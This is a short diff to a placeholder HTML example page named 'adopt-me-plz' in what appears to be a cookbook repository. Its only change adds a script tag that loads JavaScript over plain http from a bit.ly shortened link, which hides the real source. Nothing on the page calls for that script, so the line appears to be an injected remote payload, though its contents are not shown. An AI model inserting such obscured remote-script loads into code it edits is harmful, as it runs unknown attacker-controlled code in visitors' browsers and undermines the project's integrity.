--- a/cookbook/examples/adopt-me-plz/index.html
+++ b/cookbook/examples/adopt-me-plz/index.html
@@ -40,5 +40,6 @@
                 Lorem ipsum dolor sit amet consectetur, adipisicing elit. Labore dolor delectus illo architecto animi nostrum, non accusantium id, praesentium fugit magnam sint dicta! Qui fugiat officiis sed vero iste aliquam?
             </p>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
